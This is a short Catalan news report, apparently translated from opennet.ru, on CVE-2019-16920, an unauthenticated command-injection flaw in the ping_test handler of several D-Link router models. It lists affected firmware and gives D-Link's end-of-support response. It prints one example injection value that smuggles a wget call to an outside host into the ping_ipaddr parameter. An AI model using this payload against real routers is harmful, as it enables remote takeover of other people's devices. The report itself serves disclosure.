Vulnerabilitat explotable de forma remota als encaminadors D-Link

En els encaminadors sense fil D-Link identificat vulnerabilitat perillosa (CVE-2019–16920), que us permet executar codi de manera remota al costat del dispositiu enviant una sol·licitud especial al controlador "ping_test", accessible sense autenticació.

Curiosament, segons els desenvolupadors del microprogramari, la crida "ping_test" només s'ha d'executar després de l'autenticació, però en realitat s'anomena en qualsevol cas, independentment d'iniciar sessió a la interfície web. En particular, quan s'accedeix a l'script apply_sec.cgi i es passa el paràmetre “action=ping_test”, l'script redirigeix ​​a la pàgina d'autenticació, però al mateix temps realitza l'acció associada a ping_test. Per executar el codi, es va utilitzar una altra vulnerabilitat al mateix ping_test, que crida a la utilitat ping sense comprovar correctament la correcció de l'adreça IP enviada per a la prova. Per exemple, per trucar a la utilitat wget i transferir els resultats de l'ordre "echo 1234" a un host extern, només cal que especifiqueu el paràmetre "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://". test.test/?$( echo 1234)".

Vulnerabilitat explotable de forma remota als encaminadors D-Link

La presència de la vulnerabilitat s'ha confirmat oficialment en els models següents:

  • DIR-655 amb firmware 3.02b05 o anterior;
  • DIR-866L amb firmware 1.03b04 o anterior;
  • DIR-1565 amb firmware 1.01 o anterior;
  • DIR-652 (no es proporciona informació sobre les versions de microprogramari problemàtiques)

El període de suport per a aquests models ja ha expirat, així que D-Link va declarar, que no llançarà actualitzacions perquè eliminen la vulnerabilitat, no recomana utilitzar-les i aconsella substituir-les per dispositius nous. Com a solució de seguretat, podeu limitar l'accés a la interfície web només a adreces IP de confiança.

Més tard es va descobrir que la vulnerabilitat també ho era afecta models DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 i DIR-825, plans per publicar actualitzacions dels quals encara no es coneixen.

Font: opennet.ru

Afegeix comentari